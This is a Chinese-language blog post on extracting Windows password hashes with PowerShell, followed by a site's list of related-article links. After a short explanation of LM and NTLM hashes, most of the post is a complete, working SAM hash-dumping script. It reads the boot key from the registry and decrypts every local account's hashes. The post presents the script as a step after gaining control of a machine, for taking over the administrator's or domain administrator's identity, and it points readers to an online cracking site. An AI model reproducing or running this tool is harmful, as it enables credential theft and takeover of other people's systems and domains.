通過PowerShell獲取Windows系統密碼Hash

@天行健中國元素發表於2014-10-08

當你拿到了系統控制權之後如何才能更長的時間內控制已經拿到這臺機器呢？作為白帽子，已經在對手防線上撕開一個口子，如果你需要進一步擴大戰果，你首先需要做的就是潛伏下來，收集更多的資訊便於你判斷，便於有更大的收穫。用什麼方法才能有儘可能高的許可權，同時能更有效的隱藏自己，是留webshell，留後門，種木馬還是Rootkit？webshell，哪怕是一句話木馬都很容易被管理員清除，放了木馬，也容易被有經驗的管理員查出，不管是早期自己建立程式，程式被幹掉就完了，還是注入程式的木馬，或者是以服務自啟動的木馬，哪怕是替換次要的系統服務自己啟動的木馬，隱蔽性都太差了。不管後門留的如何完美，木馬免殺做的多好，最終還是做不到不留任何痕跡。

那什麼方法才能達到目的，又不容易被發現呢？以管理員的身份來管理伺服器不就行了麼？不管管理員是用3389、pcanywhere、還是radmin管理伺服器，獲取他的密碼，以他的身份進入系統不就得了，如果是域管理員密碼，整個域都會在你的控制之下了。獲取密碼的方法除了網路嗅探，還可以獲取密碼Hash後通過彩虹表進行攻擊，本文將會介紹通過PowerShell獲取Windows系統密碼Hash的方法，有何密碼Hash就離拿到密碼不遠了。

首先介紹一下windows密碼Hash：

早期SMB協議在網路上傳輸明文口令。後來出現"LAN Manager Challenge/Response"驗證機制，簡稱LM，它是如此簡單以至很容易被破解。微軟提出了WindowsNT挑戰/響應驗證機制，稱之為NTLM。現在已經有了更新的NTLMv2以及Kerberos驗證體系。Windows加密過的密碼口令，我們稱之為hash（中文：雜湊），Windows的系統密碼hash預設情況下一般由兩部分組成：第一部分是LM-hash，第二部分是NTLM-hash。

NTLM-Hash與LM-Hash演算法相比，明文口令大小寫敏感，但無法根據NTLM-Hash判斷原始明文口令是否小於8位元組，擺脫了魔術字串"KGS!@#$%"。MD4是真正的單向雜湊函式，窮舉做為資料來源出現的明文，難度較大。問題在於，微軟一味強調NTLM-Hash的強度高，卻避而不談一個事實，為了保持向後相容性，NTLM-Hash預設總是與LM-Hash一起使用的。這意味著NTLM-Hash強調再高也是無助於安全的，相反潛在損害著安全性。增加NTLM-Hash後，首先利用LM-Hash的弱點窮舉出原始明文口令的大小寫不敏感版本，再利用NTLM-Hash修正出原始明文口令的大小寫敏感版本。

Windows系統下的hash密碼格式為：使用者名稱稱:RID:LM-HASH值:NT-HASH值，例如：

Administrator:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC:::表示

使用者名稱稱為：Administrator

RID為：500

LM-HASH值為：C8825DB10F2590EAAAD3B435B51404EE

NT-HASH值為：683020925C5D8569C23AA724774CE6CC

如果你知道這個使用者的hash密碼了，拿著C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC去hash線上查詢網站

http://www.objectif-securite.ch/en/ophcrack.php查一下很容易就能得到密碼。

下面直接上程式碼，然後對程式碼簡單做一個解釋，最後演示一下執行效果。

function Get-WinPassHashes
{
<# Author:fuhj(powershell#live.cn ,http://fuhaijun.com)  
    # Get windows password hash and returns the hash list
    #.Example
    #   Get-WinPassHashes
    #
    #>

    [CmdletBinding()]
    Param ()
function LoadApi
{
    $oldErrorAction = $global:ErrorActionPreference;
    $global:ErrorActionPreference = "SilentlyContinue";
    $test = [PowerDump.Native];
    $global:ErrorActionPreference = $oldErrorAction;
    if ($test)
    {
        # already loaded
        return;
     }

$code = @'
using System;
using System.Security.Cryptography;
using System.Runtime.InteropServices;
using System.Text;

namespace PowerDump
{
    public class Native
    {
    [DllImport("advapi32.dll", CharSet = CharSet.Auto)]
     public static extern int RegOpenKeyEx(
        int hKey,
        string subKey,
        int ulOptions,
        int samDesired,
        out int hkResult);

    [DllImport("advapi32.dll", EntryPoint = "RegEnumKeyEx")]
    extern public static int RegEnumKeyEx(
        int hkey,
        int index,
        StringBuilder lpName,
        ref int lpcbName,
        int reserved,
        StringBuilder lpClass,
        ref int lpcbClass,
        out long lpftLastWriteTime);

    [DllImport("advapi32.dll", EntryPoint="RegQueryInfoKey", CallingConvention=CallingConvention.Winapi, SetLastError=true)]
    extern public static int RegQueryInfoKey(
        int hkey,
        StringBuilder lpClass,
        ref int lpcbClass,
        int lpReserved,
        out int lpcSubKeys,
        out int lpcbMaxSubKeyLen,
        out int lpcbMaxClassLen,
        out int lpcValues,
        out int lpcbMaxValueNameLen,
        out int lpcbMaxValueLen,
        out int lpcbSecurityDescriptor,
        IntPtr lpftLastWriteTime);

    [DllImport("advapi32.dll", SetLastError=true)]
    public static extern int RegCloseKey(
        int hKey);

        }
    } // end namespace PowerDump

    public class Shift {
        public static int   Right(int x,   int count) { return x >> count; }
        public static uint  Right(uint x,  int count) { return x >> count; }
        public static long  Right(long x,  int count) { return x >> count; }
        public static ulong Right(ulong x, int count) { return x >> count; }
        public static int    Left(int x,   int count) { return x << count; }
        public static uint   Left(uint x,  int count) { return x << count; }
        public static long   Left(long x,  int count) { return x << count; }
        public static ulong  Left(ulong x, int count) { return x << count; }
    }
'@

   $provider = New-Object Microsoft.CSharp.CSharpCodeProvider
   $dllName = [PsObject].Assembly.Location
   $compilerParameters = New-Object System.CodeDom.Compiler.CompilerParameters
   $assemblies = @("System.dll", $dllName)
   $compilerParameters.ReferencedAssemblies.AddRange($assemblies)
   $compilerParameters.GenerateInMemory = $true
   $compilerResults = $provider.CompileAssemblyFromSource($compilerParameters, $code)
   if($compilerResults.Errors.Count -gt 0) {
     $compilerResults.Errors | % { Write-Error ("{0}:`t{1}" -f $_.Line,$_.ErrorText) }
   }

}

$antpassword = [Text.Encoding]::ASCII.GetBytes("NTPASSWORD`0");
$almpassword = [Text.Encoding]::ASCII.GetBytes("LMPASSWORD`0");
$empty_lm = [byte[]]@(0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee);
$empty_nt = [byte[]]@(0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89,0xc0);
$odd_parity = @(
  1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
  16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
  32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
  49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
  64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
  81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
  97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
  112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
  128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
  145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
  161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
  176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
  193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
  208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
  224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
  241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
);

function sid_to_key($sid)
{
    $s1 = @();
    $s1 += [char]($sid -band 0xFF);
    $s1 += [char]([Shift]::Right($sid,8) -band 0xFF);
    $s1 += [char]([Shift]::Right($sid,16) -band 0xFF);
    $s1 += [char]([Shift]::Right($sid,24) -band 0xFF);
    $s1 += $s1[0];
    $s1 += $s1[1];
    $s1 += $s1[2];
    $s2 = @();
    $s2 += $s1[3]; $s2 += $s1[0]; $s2 += $s1[1]; $s2 += $s1[2];
    $s2 += $s2[0]; $s2 += $s2[1]; $s2 += $s2[2];
    return ,((str_to_key $s1),(str_to_key $s2));
}

function str_to_key($s)
{
    $key = @();
    $key += [Shift]::Right([int]($s[0]), 1 );
    $key += [Shift]::Left( $([int]($s[0]) -band 0x01), 6) -bor [Shift]::Right([int]($s[1]),2);
    $key += [Shift]::Left( $([int]($s[1]) -band 0x03), 5) -bor [Shift]::Right([int]($s[2]),3);
    $key += [Shift]::Left( $([int]($s[2]) -band 0x07), 4) -bor [Shift]::Right([int]($s[3]),4);
    $key += [Shift]::Left( $([int]($s[3]) -band 0x0F), 3) -bor [Shift]::Right([int]($s[4]),5);
    $key += [Shift]::Left( $([int]($s[4]) -band 0x1F), 2) -bor [Shift]::Right([int]($s[5]),6);
    $key += [Shift]::Left( $([int]($s[5]) -band 0x3F), 1) -bor [Shift]::Right([int]($s[6]),7);
    $key += $([int]($s[6]) -band 0x7F);
    0..7 | %{
        $key[$_] = [Shift]::Left($key[$_], 1);
        $key[$_] = $odd_parity[$key[$_]];
        }
    return ,$key;
}

function NewRC4([byte[]]$key)
{
    return new-object Object |
    Add-Member NoteProperty key $key -PassThru |
    Add-Member NoteProperty S $null -PassThru |
    Add-Member ScriptMethod init {
        if (-not $this.S)
        {
            [byte[]]$this.S = 0..255;
            0..255 | % -begin{[long]$j=0;}{
                $j = ($j + $this.key[$($_ % $this.key.Length)] + $this.S[$_]) % $this.S.Length;
                $temp = $this.S[$_]; $this.S[$_] = $this.S[$j]; $this.S[$j] = $temp;
                }
        }
    } -PassThru |
    Add-Member ScriptMethod "encrypt" {
        $data = $args[0];
        $this.init();
        $outbuf = new-object byte[] $($data.Length);
        $S2 = $this.S[0..$this.S.Length];
        0..$($data.Length-1) | % -begin{$i=0;$j=0;} {
            $i = ($i+1) % $S2.Length;
            $j = ($j + $S2[$i]) % $S2.Length;
            $temp = $S2[$i];$S2[$i] = $S2[$j];$S2[$j] = $temp;
            $a = $data[$_];
            $b = $S2[ $($S2[$i]+$S2[$j]) % $S2.Length ];
            $outbuf[$_] = ($a -bxor $b);
        }
        return ,$outbuf;
    } -PassThru
}

function des_encrypt([byte[]]$data, [byte[]]$key)
{
    return ,(des_transform $data $key $true)
}

function des_decrypt([byte[]]$data, [byte[]]$key)
{
    return ,(des_transform $data $key $false)
}

function des_transform([byte[]]$data, [byte[]]$key, $doEncrypt)
{
    $des = new-object Security.Cryptography.DESCryptoServiceProvider;
    $des.Mode = [Security.Cryptography.CipherMode]::ECB;
    $des.Padding = [Security.Cryptography.PaddingMode]::None;
    $des.Key = $key;
    $des.IV = $key;
    $transform = $null;
    if ($doEncrypt) {$transform = $des.CreateEncryptor();}
    else{$transform = $des.CreateDecryptor();}
    $result = $transform.TransformFinalBlock($data, 0, $data.Length);
    return ,$result;
}

function Get-RegKeyClass([string]$key, [string]$subkey)
{
    switch ($Key) {
        "HKCR" { $nKey = 0x80000000} #HK Classes Root
        "HKCU" { $nKey = 0x80000001} #HK Current User
        "HKLM" { $nKey = 0x80000002} #HK Local Machine
        "HKU"  { $nKey = 0x80000003} #HK Users
        "HKCC" { $nKey = 0x80000005} #HK Current Config
        default {
            throw "Invalid Key. Use one of the following options HKCR, HKCU, HKLM, HKU, HKCC"
        }
    }
    $KEYQUERYVALUE = 0x1;
    $KEYREAD = 0x19;
    $KEYALLACCESS = 0x3F;
    $result = "";
    [int]$hkey=0
    if (-not [PowerDump.Native]::RegOpenKeyEx($nkey,$subkey,0,$KEYREAD,[ref]$hkey))
    {
        $classVal = New-Object Text.Stringbuilder 1024
        [int]$len = 1024
        if (-not [PowerDump.Native]::RegQueryInfoKey($hkey,$classVal,[ref]$len,0,[ref]$null,[ref]$null,
            [ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,0))
        {
            $result = $classVal.ToString()
        }
        else
        {
            Write-Error "RegQueryInfoKey failed";
        }
        [PowerDump.Native]::RegCloseKey($hkey) | Out-Null
    }
    else
    {
        Write-Error "Cannot open key";
    }
    return $result;
}

function Get-BootKey
{
    $s = [string]::Join("",$("JD","Skew1","GBG","Data" | %{Get-RegKeyClass "HKLM" "SYSTEM\CurrentControlSet\Control\Lsa\$_"}));
    $b = new-object byte[] $($s.Length/2);
    0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)}
    $b2 = new-object byte[] 16;
    0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 | % -begin{$i=0;}{$b2[$i]=$b[$_];$i++}
    return ,$b2;
}

function Get-HBootKey
{
    param([byte[]]$bootkey);
    $aqwerty = [Text.Encoding]::ASCII.GetBytes("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%`0");
    $anum = [Text.Encoding]::ASCII.GetBytes("0123456789012345678901234567890123456789`0");
    $k = Get-Item HKLM:\SAM\SAM\Domains\Account;
    if (-not $k) {return $null}
    [byte[]]$F = $k.GetValue("F");
    if (-not $F) {return $null}
    $rc4key = [Security.Cryptography.MD5]::Create().ComputeHash($F[0x70..0x7F] + $aqwerty + $bootkey + $anum);
    $rc4 = NewRC4 $rc4key;
    return ,($rc4.encrypt($F[0x80..0x9F]));
}

function Get-UserName([byte[]]$V)
{
    if (-not $V) {return $null};
    $offset = [BitConverter]::ToInt32($V[0x0c..0x0f],0) + 0xCC;
    $len = [BitConverter]::ToInt32($V[0x10..0x13],0);
    return [Text.Encoding]::Unicode.GetString($V, $offset, $len);
}

function Get-UserHashes($u, [byte[]]$hbootkey)
{
    [byte[]]$enc_lm_hash = $null; [byte[]]$enc_nt_hash = $null;
    if ($u.HashOffset + 0x28 -lt $u.V.Length)
    {
        $lm_hash_offset = $u.HashOffset + 4;
        $nt_hash_offset = $u.HashOffset + 8 + 0x10;
        $enc_lm_hash = $u.V[$($lm_hash_offset)..$($lm_hash_offset+0x0f)];
        $enc_nt_hash = $u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
    }
    elseif ($u.HashOffset + 0x14 -lt $u.V.Length)
    {
        $nt_hash_offset = $u.HashOffset + 8;
        $enc_nt_hash = [byte[]]$u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
    }
    return ,(DecryptHashes $u.Rid $enc_lm_hash $enc_nt_hash $hbootkey);
}

function DecryptHashes($rid, [byte[]]$enc_lm_hash, [byte[]]$enc_nt_hash, [byte[]]$hbootkey)
{
    [byte[]]$lmhash = $empty_lm; [byte[]]$nthash=$empty_nt;
    # LM Hash
    if ($enc_lm_hash)
    {
        $lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;
    }

    # NT Hash
    if ($enc_nt_hash)
    {
        $nthash = DecryptSingleHash $rid $hbootkey $enc_nt_hash $antpassword;
    }

    return ,($lmhash,$nthash)
}

function DecryptSingleHash($rid,[byte[]]$hbootkey,[byte[]]$enc_hash,[byte[]]$lmntstr)
{
    $deskeys = sid_to_key $rid;
    $md5 = [Security.Cryptography.MD5]::Create();
    $rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);
    $rc4 = NewRC4 $rc4_key;
    $obfkey = $rc4.encrypt($enc_hash);
    $hash = (des_decrypt  $obfkey[0..7] $deskeys[0]) +
        (des_decrypt $obfkey[8..$($obfkey.Length - 1)] $deskeys[1]);
    return ,$hash;
}

function Get-UserKeys
{
    ls HKLM:\SAM\SAM\Domains\Account\Users |
        where {$_.PSChildName -match "^[0-9A-Fa-f]{8}$"} |
            Add-Member AliasProperty KeyName PSChildName -PassThru |
            Add-Member ScriptProperty Rid {[Convert]::ToInt32($this.PSChildName, 16)} -PassThru |
            Add-Member ScriptProperty V {[byte[]]($this.GetValue("V"))} -PassThru |
            Add-Member ScriptProperty UserName {Get-UserName($this.GetValue("V"))} -PassThru |
            Add-Member ScriptProperty HashOffset {[BitConverter]::ToUInt32($this.GetValue("V")[0x9c..0x9f],0) + 0xCC} -PassThru
}

function DumpHashes
{
    LoadApi
    $bootkey = Get-BootKey;
    $hbootKey = Get-HBootKey $bootkey;
    Get-UserKeys | %{
        $hashes = Get-UserHashes $_ $hBootKey;
        "{0}:{1}:{2}:{3}:::" -f ($_.UserName,$_.Rid,
            [BitConverter]::ToString($hashes[0]).Replace("-","").ToLower(),
            [BitConverter]::ToString($hashes[1]).Replace("-","").ToLower());
    }
}
DumpHashes
}

程式碼中定義的函式Get-WinPassHashes中定義了多個函式，在函式的最後呼叫DumpHashes作為入口函式。

執行效果如下所示

拿著hash速速破解密碼去吧^_^

作者: 付海軍
出處：http://fuhj02.cnblogs.com
版權：本文版權歸作者和部落格園共有
轉載：歡迎轉載，為了儲存作者的創作熱情，請按要求【轉載】，謝謝
要求：未經作者同意，必須保留此段宣告；必須在文章中給出原文連線；否則必究法律責任
個人網站: http://www.fuhaijun.com/

通過PowerShell獲取TCP響應(類Telnet)
2014-10-10
TCP
在Windows, Mac, Linux三種系統中分別獲取wifi密碼的方式
2020-11-30
WindowsMacLinuxWiFi密碼
在linux上通過ssh直接登入到windows系統上，不用密碼
2011-07-18
LinuxWindows密碼
MacOS Big Sur系統不需要通過獲取系統許可權而獲取Hidpi
2020-10-30
Mac
獲取系統帳戶密碼週期的例項
2009-02-05
密碼
直播系統程式碼，Android獲取、設定鎖屏密碼
2021-12-22
Android密碼
Android 原始碼獲取-----在Windows環境下通過Git得到Android原始碼
2013-11-03
Android原始碼WindowsGit
通過gitHub獲取vlc-Android原始碼
2016-02-24
GithubAndroid原始碼
windows以及linux獲取系統時間
2014-06-12
WindowsLinux
通過EPROCESS獲取程式名
2016-03-18
PowerShell 指令碼中的密碼
2017-08-01
指令碼密碼
win10怎麼獲取wifi 密碼_win10系統wifi密碼怎麼檢視
2020-07-15
Win10WiFi密碼
msn密碼獲取軟體
2017-11-12
密碼
使用命令檢視windows系統連線過的wifi密碼
2019-02-23
WindowsWiFi密碼
javascript通過class屬性獲取元素的程式碼
2017-03-26
JavaScript
Windows使用java過程獲取作業系統磁碟以及記憶體資訊
2017-09-06
WindowsJava作業系統記憶體
Windows系統安全獲取重要資訊的方法(一)
2020-11-29
Windows
JavaScript 通過class獲取元素物件
2019-05-16
JavaScript物件
通過用shellcode獲取shell
2020-10-08
windows10系統如何修改wifi密碼
2019-06-11
WindowsWiFi密碼
Powershell 命令列安裝 Windows 作業系統
2021-09-20
命令列Windows作業系統
防止密碼被非法獲取 (轉)
2007-12-29
密碼
聊天平臺原始碼，通過MediaStore獲取縮圖模糊
2021-10-29
原始碼AST
【Azure Developer】使用 Microsoft Authentication Libraries (MSAL) 如何來獲取Token呢 (通過使用者名稱和密碼方式獲取Access Token)
2022-05-05
DeveloperROS密碼
Powershell 如何批次獲取檔案大小的實現程式碼
2021-05-13
Windows10系統怎麼透過聯機獲取更多主題【圖文】
2016-03-07
Windows
PowerShell讀取Windows產品金鑰
2013-10-04
Windows
谷歌通過Android可能獲知全球大部分WiFi密碼
2013-09-16
谷歌AndroidWiFi密碼
中國電信“商密雲端儲存系統”通過國家商用密碼產品鑑定
2018-05-02
密碼
Win10系統如何開啟Windows Powershell_Win10開啟Windows Powershell圖文教程
2020-03-19
Win10Windows
獲取系統版本
2016-05-20
windows10系統如何更改開機密碼
2022-01-13
Windows密碼
windows系統怎樣設定開機密碼
2016-08-30
Windows密碼
史上最簡單的Windows系統密碼解救
2007-09-07
Windows密碼
Grails通過sessionId獲取session物件
2019-02-22
AISession物件
通過web url獲取檔案資訊
2019-05-11
Web
通過反射獲取窗體例項
2016-08-24
反射
通過Java反射動態獲取資訊
2013-06-07
Java反射

通過PowerShell獲取Windows系統密碼Hash

相關文章